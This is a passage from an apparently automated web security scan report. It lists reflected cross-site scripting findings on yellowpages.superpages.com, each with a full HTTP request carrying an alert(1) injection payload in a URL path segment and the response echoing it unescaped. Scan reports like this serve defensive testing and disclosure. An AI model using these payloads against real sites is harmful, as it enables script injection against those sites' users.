Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile41f5f&quot;-alert(1)-&quot;a4339366c19/js/photos.js
Server: Unspecified
Set-Cookie: JSESSIONID=FB668622B170916BD529AC461293019E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:04 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile41f5f"-alert(1)-"a4339366c19/js/photos.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.560. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/photos.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bda1"-alert(1)-"1e48a19052d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js9bda1"-alert(1)-"1e48a19052d/photos.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js9bda1&quot;-alert(1)-&quot;1e48a19052d/photos.js
Server: Unspecified
Set-Cookie: JSESSIONID=B2551730408681FE84948CBA5537D917; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:12 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js9bda1"-alert(1)-"1e48a19052d/photos.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.561. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/photos.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92aa7"-alert(1)-"ad045aaf68e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js/photos.js92aa7"-alert(1)-"ad045aaf68e HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js/photos.js92aa7&quot;-alert(1)-&quot;ad045aaf68e
Server: Unspecified
Set-Cookie: JSESSIONID=8B974E034538B797392AD6254625C8BF; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:22 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
lowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js/photos.js92aa7"-alert(1)-"ad045aaf68e?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.562. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/script.more.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50c0b"-alert(1)-"1189d0fb19e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile50c0b"-alert(1)-"1189d0fb19e/script.more.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile50c0b&quot;-alert(1)-&quot;1189d0fb19e/script.more.js
Server: Unspecified
Set-Cookie: JSESSIONID=E9DAEB1458FBC9F0B5240D898F7B6C6D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:21 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile50c0b"-alert(1)-"1189d0fb19e/script.more.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.563. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/script.more.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 696df"-alert(1)-"ae58cd1d73c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/script.more.js696df"-alert(1)-"ae58cd1d73c HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/script.more.js696df&quot;-alert(1)-&quot;ae58cd1d73c
Server: Unspecified
Set-Cookie: JSESSIONID=42E6EF654C25ED299F245617595471E5; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:30 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/script.more.js696df"-alert(1)-"ae58cd1d73c?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.564. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/forms.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e37"-alert(1)-"a77217be230 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common27e37"-alert(1)-"a77217be230/css/forms.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common27e37&quot;-alert(1)-&quot;a77217be230/css/forms.css
Server: Unspecified
Set-Cookie: JSESSIONID=DE3B6F76810C5748044659F1E3097E68; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:28 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common27e37"-alert(1)-"a77217be230/css/forms.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.565. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/forms.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7342"-alert(1)-"107199becab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssf7342"-alert(1)-"107199becab/forms.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssf7342&quot;-alert(1)-&quot;107199becab/forms.css
Server: Unspecified
Set-Cookie: JSESSIONID=65C38E08AACFCA247496A1F49E6DB041; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:36 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssf7342"-alert(1)-"107199becab/forms.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.566. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/forms.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1c09"-alert(1)-"6f31add0046 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/forms.cssf1c09"-alert(1)-"6f31add0046 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/forms.cssf1c09&quot;-alert(1)-&quot;6f31add0046
Server: Unspecified
Set-Cookie: JSESSIONID=0B17752584FF1A2DC3811629C5253765; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:44 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/forms.cssf1c09"-alert(1)-"6f31add0046?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.567. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fdca"-alert(1)-"96068b15aaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common3fdca"-alert(1)-"96068b15aaf/css/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common3fdca&quot;-alert(1)-&quot;96068b15aaf/css/print.css
Server: Unspecified
Set-Cookie: JSESSIONID=0CB998F802310503F3DF642089016142; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:00 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common3fdca"-alert(1)-"96068b15aaf/css/print.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.568. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/print.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef7bf"-alert(1)-"eed6ae6e6f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssef7bf"-alert(1)-"eed6ae6e6f1/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssef7bf&quot;-alert(1)-&quot;eed6ae6e6f1/print.css
Server: Unspecified
Set-Cookie: JSESSIONID=BFEAD8CA936BB2E59BD56DAA6BF8F3D7; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:07 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssef7bf"-alert(1)-"eed6ae6e6f1/print.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.569. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/print.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a006a"-alert(1)-"cbff4859ae5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/print.cssa006a"-alert(1)-"cbff4859ae5 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/print.cssa006a&quot;-alert(1)-&quot;cbff4859ae5
Server: Unspecified
Set-Cookie: JSESSIONID=7112A7C7D0BF2A8F8F9AF1A7F814C733; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:16 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/print.cssa006a"-alert(1)-"cbff4859ae5?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.570. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/reset.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da1ff"-alert(1)-"dc2efa902dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonda1ff"-alert(1)-"dc2efa902dc/css/reset.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonda1ff&quot;-alert(1)-&quot;dc2efa902dc/css/reset.css
Server: Unspecified
Set-Cookie: JSESSIONID=4239D7C1884951A967FFE5B24D2C2BFE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:21 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonda1ff"-alert(1)-"dc2efa902dc/css/reset.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.571. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/reset.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95a34"-alert(1)-"686e302e816 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css95a34"-alert(1)-"686e302e816/reset.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css95a34&quot;-alert(1)-&quot;686e302e816/reset.css
Server: Unspecified
Set-Cookie: JSESSIONID=7716BE18718FF0A9D0724AA014CD1180; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:28 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css95a34"-alert(1)-"686e302e816/reset.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.572. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/reset.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aabb"-alert(1)-"23c3bf4d12 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/reset.css3aabb"-alert(1)-"23c3bf4d12 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/reset.css3aabb&quot;-alert(1)-&quot;23c3bf4d12
Server: Unspecified
Set-Cookie: JSESSIONID=1ECBA4F29730F93048865C6330D8702E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:36 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/reset.css3aabb"-alert(1)-"23c3bf4d12?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.573. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sendtom.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad15d"-alert(1)-"4cb99c62a1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonad15d"-alert(1)-"4cb99c62a1b/css/sendtom.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonad15d&quot;-alert(1)-&quot;4cb99c62a1b/css/sendtom.css
Server: Unspecified
Set-Cookie: JSESSIONID=98569611A90DDF545C63EF46782C91CF; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:16 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonad15d"-alert(1)-"4cb99c62a1b/css/sendtom.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.574. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
